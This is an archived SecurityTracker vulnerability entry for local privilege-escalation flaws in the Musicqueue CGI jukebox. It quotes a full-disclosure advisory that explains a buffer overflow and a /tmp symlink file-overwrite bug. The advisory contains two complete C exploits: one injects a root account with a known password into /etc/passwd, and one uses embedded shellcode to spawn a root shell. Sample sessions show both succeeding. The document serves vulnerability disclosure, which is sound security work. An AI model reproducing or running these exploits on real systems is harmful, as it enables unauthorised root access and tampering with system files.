SecurityTracker.com Archives - Musicqueue Buffer Overflow May Let Local Users Gain Elevated Privileges

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Multimedia) > Musicqueue

Vendors: Dalen, Erik

Musicqueue Buffer Overflow May Let Local Users Gain Elevated Privileges

SecurityTracker Alert ID: 1008014

SecurityTracker URL: http://securitytracker.com/id?1008014

CVE Reference: CVE-2003-1139 , CVE-2003-1140 (Links to External Site)

Updated: May 19 2008

Original Entry Date: Oct 28 2003

Impact: Execution of arbitrary code via local system, Modification of system information, Modification of user information, Root access via local system, User access via local system

Exploit Included: Yes

Advisory: INetCop Security

Version(s): 1.2.0 and prior versions

Description: Several vulnerabilities were reported in Musicqueue. A local user may be able to gain elevated privileges on the target system.

INetCop Security reported that the getConf() function contains an overflow in the processing of the HTTP_ACCEPT_LANGUAGE language variable. A local user can exploit this to execute arbitrary code. The software is reportedly installed with set user id (setuid) and set group id (setgid) privileges based on the privileges of the user that performs the install. The arbitrary code will run with those setuid/setgid privileges.

The report indicates that version 0.9 through 1.1.1 are vulnerable to the buffer overflow.

Other buffer overflows that may result in a segmentation fault are reported.

It is also reported that a local user can cause the application to crash and overwrite contains of the '/tmp/musicqueue.crash' file with the setuid/setgid privileges of the application. A local user can create a symbolic link from a critical file on the system to this temporary file and then trigger the flaw to cause the symlinked file to be overwritten.

Some demonstration exploit code is provided in the Source Message.

Impact: A local user can execute arbitrary code with the setuid/setgid privileges of the application, which may be root privileges on some systems.

Solution: No solution was available at the time of this entry.

Vendor URL: musicqueue.sourceforge.net/ (Links to External Site)

Cause: Access control error, Boundary error, State error

Underlying OS: Linux (Any), UNIX (Any)

Reported By: "dong-h0un U" <xploit@hackermail.com>

Message History: None.

Source Message Contents

Date: Mon, 27 Oct 2003 22:43:31 +0800
From: "dong-h0un U" <xploit@hackermail.com>
Subject: [Full-Disclosure] Musicqueue multiple local vulnerabilities

 



	========================================
	INetCop Security Advisory #2003-0x82-020
	========================================


* Title: Musicqueue multiple local vulnerabilities


0x01. Description


Musicqueue is a CGI music jukebox using external tools to play the files.
Because of that it supports several formats. It supports two modes, enqueue and vote.
In vote mode users can vote on music and the song with the most votes is played.
In enqueue mode, songs are enqueued and the one that's been in the playlist the longest is played.
It is themable through CSS and has many configuration options

More detailed information is: http://musicqueue.sourceforge.net/

setuid, setgid is established as user competence that musicqueue installs program by `make suid' setu
p.
Because of, setuid, setgid is established as root competence when installed it as root competence.
Or, setuid, setgid is established when general user installed.

`musicqueue.cgi' program in itself when SIGSEGV signal called, `/tmp/musicqueue.crash' file create.
And, CGI program stores environment variables that used to these contents.
For example, it's QUERY_STRING, REQUEST_METHOD, HTTP_COOKIE etc ...
(to examine segfault cause)

    --
    36  void crash(int signal)
    37  {
    38          gcgiSaveEnvVariables("/tmp/musicqueue.crash"); // gcgi library function
    39          exit(-1);
    40  }
    41
    42  int main(void)
    43  {
    44          char mode[100];
    45
    46          signal(SIGSEGV, crash);
    --

Vulnerability happens in case segfault happens.
It may overwrite CGI environment variable contents in `/tmp/musicqueue.crash' file.
If `/tmp/musicqueue.crash' file, other file symbolic-link do can, exploit is possible in local.

This program has some buffer overflow bug.
Also, have essential factor that segfault can happen.

Vulnerability exists in openLang function to translate.c

    --
    34  char openLang(char *lang)
    35  {
    36          char lfilename[20];
        ...
    43          sprintf(lfilename, "languages/language.%s", lang);
    --

Buffer overflow is possible by this. However, see next code.

    --
    51  void initTrans(void)
    52  {
    53          char *http_accept, *language;
    54
    55          http_accept = getenv("HTTP_ACCEPT_LANGUAGE");
    56
    57          if (http_accept) {
    58                  while (1) {
    59                          sscanf(http_accept, "%a[a-z]", &language);
    60                          if (openLang(language)) {
    61                                  free(language);
    62                                  return;
    63                          }
        ...
    --

Input is possible from a to z in language variable that is copied in http_accept.
Therefore, can't change to place that want return address directly.
Anyway, do this buffer overflow to do exploit in local.

If the reason uses HTTP_ACCEPT_LANGUAGE variable, when segfault happened,
because it remains minimum environment variable contents in `/tmp/musicqueue.crash' file .
If use this essential factors, it's possible that acquire root in local.

The following is local overflow vulnerability that have at `v-0.9 ~ 1.1.1' version.
Similarly, vulnerability exists in openLang function to translate.c

Let's examine code.

    --
    52          /*
    53           * Check if preferred language didn't exist. Use default
    54           * in that case.
    55           */
    56          if (lfile == NULL) {
    57                  language = getConf("language", NULL);
    58                  if (language) {
    59                          langExists(language);
    60                          free(language);
    61                  }
    62          }
    --

Yes, is interesting. getConf() function is used when read setting in config file.
Overflow of language variable happens from langExists function.
Now, can do exploit easily.

More detailed item references `Proof of Concept' code.


0x02. Vulnerable Packages


Vendor site: http://musicqueue.sourceforge.net/

musicqueue-1.2.0 (local file overwrite exploit)
-musicqueue-1.2.0.tar.gz 
+Unix
+Linux
+Other

musicqueue-0.9 ~ musicqueue-1.1.1 (local buffer overflow exploit)
-musicqueue-1.1.1.tar.gz
-musicqueue-1.1.0.tar.gz
-musicqueue-1.0.0.tar.gz
-musicqueue-1.0.0-rc1.tar.gz
-musicqueue-0.9.2.tar.gz
-musicqueue-0.9.1.tar.gz
-musicqueue-0.9.tar.gz
+Unix
+Linux
+Other


0x03. Exploit


Attached code is local file overwrite exploit and local buffer overflow exploit.
If succeed to exploit, attacker can get user's competence which install musicqueue in local.

#1) symbolic-link file overwrite exploit:

=== 0x82-Local.musicqueue_xpl.c ===

/*
**
** 0x82-Local.musicqueue_xpl -
** musicqueue.cgi v-1.2.0 local root `Proof of Concept' exploit
**
** This may add user of `REQUEST_METHOD=GET' in `/etc/passwd' file.
** And, the password is `x82'.
**
** I installed musicqueue by root. (make install-suid)
** 
** --
** [root@testsub musicqueue]# ls -al musicqueue.cgi
** -rwsr-sr-x   1 root     root        67540 Jul 20 14:54 musicqueue.cgi
** [root@testsub musicqueue]# su x82
** [x82@testsub musicqueue]$ head -1 /etc/passwd
** root:x:0:0:root:/root:/bin/bash
** [x82@testsub musicqueue]$ gcc -o 0x82-Local.musicqueue_xpl 0x82-Local.musicqueue_xpl.c
** [x82@testsub musicqueue]$ ./0x82-Local.musicqueue_xpl
**
**  0x82-Local.musicqueue_xpl - musicqueue.cgi v-1.2.0 POC exploit.
**
** [x82@testsub musicqueue]$ head -1 /etc/passwd
** REQUEST_METHOD=GET:$1$jDra3UN4$4jyyrr1pc00PRZnmlyFw91:0:0::/:/bin/sh
** [x82@testsub musicqueue]$ su REQUEST_METHOD=GET
** Password: (password is 'x82')
** [REQUEST_METHOD=GET@testsub musicqueue]# id
** uid=0(REQUEST_METHOD=GET) gid=0(root) groups=0(root)
** [REQUEST_METHOD=GET@testsub musicqueue]#
** --
**
** Don't like user's name so. :-p
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define REDHAT_7X
#undef REDHAT_7X /* touch me! */

#define DEF_TG_PATH "./musicqueue.cgi"
#define CRASH_CORE_PATH "/tmp/musicqueue.crash"
#define WRT_PASSWD_PATH "/etc/passwd"
#define REQUEST_METHOD_MK "GET" /* Username: REQUEST_METHOD=GET */
#define S_TOKEN 0x3a
#define S_PASS "$1$jDra3UN4$4jyyrr1pc00PRZnmlyFw91" /* Password: x82 */
#define DCR_PASS "x82"
#define USER_UID 0x0 /* Uid,Gid: 0 */
#define USER_GID 0x0
#define ROOT_PWD 0x2f /* Homedir: / */
#define SHELL_PATH "/bin/sh" /* Shell: /bin/sh */
#define TTL_FORMAT_STR "%s%c%s%c%d%c%d%c%c%c%c%s\n"
#define STK_OVERFLOW_STR "aaaa"
#define S_ENV_PTE "REQUEST_METHOD"
#define S_ENV_PTO "HTTP_ACCEPT_LANGUAGE"
#ifdef REDHAT_7X
#define S_ENV_PTH "QUERY_STRING"
#endif
#define DEF_ZR 0
#define DEF_NR 1
#define DEF_MN -1
#define SZ_DEF_BR (0x82)
#define DEF_LEN (1024)

int main(void)
 
	FILE *fp=(NULL);
	char atk_str[(SZ_DEF_BR)],ttl_str_bf[(DEF_LEN)];
	int r=(DEF_ZR),r_r=(DEF_ZR);

	fprintf(stdout,"\n 0x82-Local.musicqueue_xpl - musicqueue.cgi v-1.2.0 POC exploit.\n\n");

	memset((char *)atk_str,(DEF_ZR),sizeof(atk_str));
	snprintf(atk_str,sizeof(atk_str)-1,(TTL_FORMAT_STR),
		(REQUEST_METHOD_MK),(S_TOKEN),(S_PASS),(S_TOKEN),
		(USER_UID),(S_TOKEN),(USER_GID),(S_TOKEN),(S_TOKEN),
		(ROOT_PWD),(S_TOKEN),(SHELL_PATH));

	if((fp=fopen((WRT_PASSWD_PATH),"r"))==NULL)
		return((DEF_MN));

	memset((char *)ttl_str_bf,(DEF_ZR),sizeof(ttl_str_bf));
	for(r_r=(DEF_ZR);r_r<strlen(atk_str);r_r++)
		ttl_str_bf[r_r]=atk_str[r_r];

	while(fread(&r,(DEF_NR),(DEF_NR),fp))
		ttl_str_bf[r_r++]=(r);

	fclose(fp);
	ttl_str_bf[strlen(ttl_str_bf)-1]='\0';

	/* REQUEST_METHOD=GET:...:...:... passwd contents ... */
	setenv((S_ENV_PTE),(ttl_str_bf),strlen(ttl_str_bf));
	/* Stack Overflow. yeh, Its segfault happens. */
	setenv((S_ENV_PTO),(STK_OVERFLOW_STR),strlen(STK_OVERFLOW_STR));

#ifdef REDHAT_7X
	atk_str[strlen(atk_str)-1]='\0';
	setenv((S_ENV_PTH),(atk_str),strlen(atk_str));
#endif

	/* File Symbolic Link. */
	unlink(CRASH_CORE_PATH);
	symlink((WRT_PASSWD_PATH),(CRASH_CORE_PATH));

	/* Execute, Local CGI. */
	execl((DEF_TG_PATH),(DEF_TG_PATH),(NULL));
 

=== eof ===

#2) local buffer overflow exploit:

=== 0x82-musicqueue_over.c ===

/*
**
** 0x82-musicqueue_over - musicqueue.cgi local root `Proof of Concept' exploit
**
** This is general overflow exploit.
**
** --
** bash-2.04$ ./0x82-musicqueue_over /tmp/musicqueue-1.1.1/musicqueue.cgi
**
** 0x82-musicqueue_over - musicqueue.cgi v-0.9~1.1.1 `Proof of Concept'
**
** sh-2.04# id
** uid=0(root) gid=0(root) groups=500(x82)
** sh-2.04# 
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

#include <stdio.h>

int main(int argc,char *argv[])
 
	FILE *fp;
	int r_rn=0;
	char *ent_r[3],atck_d[0x82];
	char shellcode[]=
		"\220@\220@\220@\220@\220@\220@\220@\220@\220@"
		"\220@\220@\220@\220@\220@\220@\220@\220@\220@"
		"1\300\260F1\3331\311\315\2001\300\260G1\3331"
		"\311\315\200\353\037^\211v\b1\300\210F\007"
		"\211F\f\260\013\211\363\215N\b\215V\f\315\2001"
		"\333\211\330@\315\200\350\334\377\377\377"
		"/bin/sh";

	unsigned long sh_addr=(0xbfffffff-(strlen(shellcode)));
	memset((char *)atck_d,0,sizeof(atck_d));

	fprintf(stdout,"\n 0x82-musicqueue_over - musicqueue.cgi v-0.9~1.1.1 POC exploit.\n\n");

	if(argc<2)
	{
		fprintf(stdout," Usage: %s [musicqueue.cgi path]\n\n",argv[0]);
		exit(-1);
	}
	else sh_addr-=(strlen(argv[1]));

	atck_d[r_rn++]=0x82;
	for(;r_rn<44;r_rn+=4)
	{
		*(long *)&atck_d[r_rn]=sh_addr;
	}

	if((fp=fopen("musicqueue.conf","w"))==NULL)
	{
	fprintf(stderr," [-] musicqueue.conf fopen() error.\n\n");
	return(-1);
	}
	fprintf(fp,"language = %s\n",atck_d);
	fclose(fp);

	ent_r[0]="REQUEST_METHOD=GET";
	ent_r[1]=(shellcode);
	ent_r[2]=(NULL);
	execle(argv[1],"musicqueue.cgi",NULL,ent_r);
 

=== eof ===


0x04. Patch


Most unartificially, there is method to remove established setuid, setgid.
After remove setuid, setgid, establish again upload directory permission.

# chmod 1777 /music/upload
or,
# chgrp nobody /music/upload && chmod 770 /music/upload

--
Thank you.


P.S: Sorry, for my poor english.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
             My World: http://x82.i21c.net & http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by Outblaze

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2007, SecurityGlobal.net LLC